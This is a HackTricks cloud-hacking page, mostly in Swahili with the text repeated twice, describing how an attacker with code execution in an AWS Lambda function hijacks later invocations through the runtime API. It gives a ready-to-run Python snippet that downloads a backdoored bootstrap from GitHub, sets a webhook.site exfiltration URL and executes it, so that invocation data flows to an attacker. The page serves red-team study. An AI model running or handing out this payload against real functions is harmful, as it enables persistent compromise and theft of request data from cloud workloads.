AWS - Steal Lambda Requests

Learn & practice AWS Hacking:HackTricks Training AWS Red Team Expert (ARTE) Learn & practice GCP Hacking: HackTricks Training GCP Red Team Expert (GRTE)

Support HackTricks

Check the subscription plans!
Join the 💬 Discord group or the telegram group or follow us on Twitter 🐦 @hacktricks_live.
Share hacking tricks by submitting PRs to the HackTricks and HackTricks Cloud github repos.

Lambda Flow

Slicer ni mchakato nje ya kontena ambao inatuma mawito kwa mchakato wa init.
Mchakato wa init unasikiliza kwenye bandari 9001 ukionyesha baadhi ya maeneo ya kuvutia:

/2018-06-01/runtime/invocation/next – pata tukio la mwito unaofuata
/2018-06-01/runtime/invocation/{invoke-id}/response – rudisha jibu la handler kwa mwito
/2018-06-01/runtime/invocation/{invoke-id}/error – rudisha kosa la utekelezaji

bootstrap.py ina mzunguko unaopata mawito kutoka kwa mchakato wa init na inaita msimbo wa watumiaji kuwasiliana nao (/next).
Hatimaye, bootstrap.py inatuma kwa init jibu

Kumbuka kwamba bootstrap inachukua msimbo wa mtumiaji kama moduli, hivyo utekelezaji wowote wa msimbo unaofanywa na msimbo wa watumiaji unafanyika katika mchakato huu.

Stealing Lambda Requests

Lengo la shambulio hili ni kufanya msimbo wa watumiaji utekeleze mchakato mbaya wa bootstrap.py ndani ya mchakato wa bootstrap.py ambao unashughulikia ombi lenye udhaifu. Kwa njia hii, mchakato wa bootstrap mbaya utaanza kuzungumza na mchakato wa init ili kushughulikia maombi wakati bootstrap halali ime kwama ikifanya kazi ya mbaya, hivyo haitahitaji maombi kwa mchakato wa init.

Hii ni kazi rahisi kufanikisha kwani msimbo wa mtumiaji unatekelezwa na mchakato halali wa bootstrap.py. Hivyo mshambuliaji anaweza:

Kutuma matokeo ya uwongo ya mwito wa sasa kwa mchakato wa init, hivyo init inafikiri mchakato wa bootstrap unangojea mawito zaidi.
Ombi lazima litumwe kwa /${invoke-id}/response
Invoke-id inaweza kupatikana kutoka kwenye stack ya mchakato halali wa bootstrap.py kwa kutumia moduli ya inspect ya python (kama ilivyopendekezwa hapa) au tu kuomba tena kwa /2018-06-01/runtime/invocation/next (kama ilivyopendekezwa hapa).
Tekeleza boostrap.py mbaya ambayo itashughulikia mawito yafuatayo
Kwa sababu za usiri, inawezekana kutuma vigezo vya mawito ya lambda kwa C2 inayodhibitiwa na mshambuliaji na kisha kushughulikia maombi kama kawaida.
Kwa shambulio hili, inatosha kupata msimbo wa asili wa bootstrap.py kutoka kwenye mfumo au github, kuongeza msimbo mbaya na kuendesha kutoka kwa mwito wa sasa wa lambda.

Attack Steps

Pata udhaifu wa RCE.
Tengeneza bootstrap mbaya (mfano https://raw.githubusercontent.com/carlospolop/lambda_bootstrap_switcher/main/backdoored_bootstrap.py)
Tekeleza bootstrap mbaya.

You can easily perform these actions running:

python3 <<EOF
import os
import urllib3

# Download backdoored bootstrap
http = urllib3.PoolManager()
backdoored_bootstrap_url = "https://raw.githubusercontent.com/carlospolop/lambda_bootstrap_switcher/main/backdoored_bootstrap.py"
new_runtime = http.request('GET', backdoored_bootstrap_url).data

# Load new bootstrap
os.environ['URL_EXFIL'] = "https://webhook.site/c7036f43-ce42-442f-99a6-8ab21402a7c0"

exec(new_runtime)
EOF

Kwa maelezo zaidi angalia https://github.com/carlospolop/lambda_bootstrap_switcher

Marejeo

https://unit42.paloaltonetworks.com/gaining-persistency-vulnerable-lambdas/

Support HackTricks

Angalia mpango wa usajili!
Jiunge na 💬 kikundi cha Discord au kikundi cha telegram au tufuatilie kwenye Twitter 🐦 @hacktricks_live.
Shiriki mbinu za hacking kwa kuwasilisha PRs kwa HackTricks na HackTricks Cloud github repos.

PreviousAWS - Lambda Post Exploitation NextAWS - Lightsail Post Exploitation

Last updated 8 days ago

Lambda Flow

Slicer ni mchakato nje ya kontena ambao inatuma mawito kwa mchakato wa init.

Mchakato wa init unasikiliza kwenye bandari 9001 ukionyesha baadhi ya maeneo ya kuvutia:

/2018-06-01/runtime/invocation/next – pata tukio la mwito unaofuata

/2018-06-01/runtime/invocation/{invoke-id}/response – rudisha jibu la handler kwa mwito

/2018-06-01/runtime/invocation/{invoke-id}/error – rudisha kosa la utekelezaji

bootstrap.py ina mzunguko unaopata mawito kutoka kwa mchakato wa init na inaita msimbo wa watumiaji kuwasiliana nao (/next).

Hatimaye, bootstrap.py inatuma kwa init jibu

Kumbuka kwamba bootstrap inachukua msimbo wa mtumiaji kama moduli, hivyo utekelezaji wowote wa msimbo unaofanywa na msimbo wa watumiaji unafanyika katika mchakato huu.

Stealing Lambda Requests

Hii ni kazi rahisi kufanikisha kwani msimbo wa mtumiaji unatekelezwa na mchakato halali wa bootstrap.py. Hivyo mshambuliaji anaweza:

Kutuma matokeo ya uwongo ya mwito wa sasa kwa mchakato wa init, hivyo init inafikiri mchakato wa bootstrap unangojea mawito zaidi.

Ombi lazima litumwe kwa /${invoke-id}/response

Invoke-id inaweza kupatikana kutoka kwenye stack ya mchakato halali wa bootstrap.py kwa kutumia moduli ya inspect ya python (kama ilivyopendekezwa hapa) au tu kuomba tena kwa /2018-06-01/runtime/invocation/next (kama ilivyopendekezwa hapa).

Tekeleza boostrap.py mbaya ambayo itashughulikia mawito yafuatayo

Kwa sababu za usiri, inawezekana kutuma vigezo vya mawito ya lambda kwa C2 inayodhibitiwa na mshambuliaji na kisha kushughulikia maombi kama kawaida.

Kwa shambulio hili, inatosha kupata msimbo wa asili wa bootstrap.py kutoka kwenye mfumo au github, kuongeza msimbo mbaya na kuendesha kutoka kwa mwito wa sasa wa lambda.

Attack Steps

You can easily perform these actions running:

python3 <<EOF
import os
import urllib3

# Download backdoored bootstrap
http = urllib3.PoolManager()
backdoored_bootstrap_url = "https://raw.githubusercontent.com/carlospolop/lambda_bootstrap_switcher/main/backdoored_bootstrap.py"
new_runtime = http.request('GET', backdoored_bootstrap_url).data

# Load new bootstrap
os.environ['URL_EXFIL'] = "https://webhook.site/c7036f43-ce42-442f-99a6-8ab21402a7c0"

exec(new_runtime)
EOF